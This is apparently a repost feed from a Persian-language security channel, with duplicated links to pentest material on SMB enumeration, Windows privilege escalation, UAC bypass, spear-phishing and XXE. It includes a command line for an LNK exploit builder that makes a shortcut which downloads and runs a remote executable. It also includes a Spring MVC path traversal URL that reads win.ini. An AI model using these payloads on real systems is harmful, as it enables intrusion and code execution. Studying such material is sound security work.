ابزارها و راهکارهای جمع آوری اطلاعات از سرویس SMB
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
#windows
#pentest
#privesc
@sec_nerd
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
#windows
#pentest
#privesc
@sec_nerd
0xdf hacks stuff
PWK Notes: SMB Enumeration Checklist [Updated]
🚨[Updated for 2024] Check out the latest version of this post here.🚨
github.com/A-mIn3/WINspect
Powershell-based Windows Security Auditing Toolbox
#windows
#security
#ps
@sec_nerd
Powershell-based Windows Security Auditing Toolbox
#windows
#security
#ps
@sec_nerd
GitHub
GitHub - A-mIn3/WINspect: Powershell-based Windows Security Auditing Toolbox
Powershell-based Windows Security Auditing Toolbox - A-mIn3/WINspect
Bug Bounty Cheat Sheet
https://github.com/EdOverflow/bugbounty-cheatsheet
#bugbounty
#pentest
#web
@sec_nerd
https://github.com/EdOverflow/bugbounty-cheatsheet
#bugbounty
#pentest
#web
@sec_nerd
بالا بردن سطح دسترسی یوزر ویندوز تا سطح SYSTEM با سوء استفاده از Osquery
CVE-2019-3567
https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html
#windows
#privesc
#pentest
@sec_nerd
CVE-2019-3567
https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html
#windows
#privesc
#pentest
@sec_nerd
Red Team Techniques: Gaining access on an external engagement through spear-phishing
https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
#phishing
#spear_phishing
#msf
@sec_nerd
https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
#phishing
#spear_phishing
#msf
@sec_nerd
Bypassing Windows User Account Control: Back For More
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-back-for-more-dd5672c48600
#windows
#pentest
#privesc
@sec_nerd
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-back-for-more-dd5672c48600
#windows
#pentest
#privesc
@sec_nerd
Automating local DTD discovery for XXE exploitation
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
#xxe
#web
#pentest
@sec_nerd
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
#xxe
#web
#pentest
@sec_nerd
A Deep Dive into XXE Injection
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
#xxe
#web
#pentest
@sec_nerd
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
#xxe
#web
#pentest
@sec_nerd
CVE-2019–13382: Local Privilege Escalation in SnagIt
https://posts.specterops.io/cve-2019-13382-local-privilege-escalation-in-snagit-abe5f31c349
#windows
#pentest
#privesc
@sec_nerd
https://posts.specterops.io/cve-2019-13382-local-privilege-escalation-in-snagit-abe5f31c349
#windows
#pentest
#privesc
@sec_nerd
LNK Exploit
https://github.com/mortychannel/lnkexploit
نحوه اجرا:
python lnk.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s payload.exe -i 1
POC:
https://youtu.be/AWGL28Qk4bA
#windows
#pentest
#exploit
@sec_nerd
https://github.com/mortychannel/lnkexploit
نحوه اجرا:
python lnk.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s payload.exe -i 1
POC:
https://youtu.be/AWGL28Qk4bA
#windows
#pentest
#exploit
@sec_nerd
GitHub
GitHub - mortychannel/lnkexploit
Contribute to mortychannel/lnkexploit development by creating an account on GitHub.
[PoC] Analysis of Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)
https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
(link: https://paper.seebug.org/991/) paper.seebug.org/991/
#exploit
#Poc
@sec_nerd
https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
(link: https://paper.seebug.org/991/) paper.seebug.org/991/
#exploit
#Poc
@sec_nerd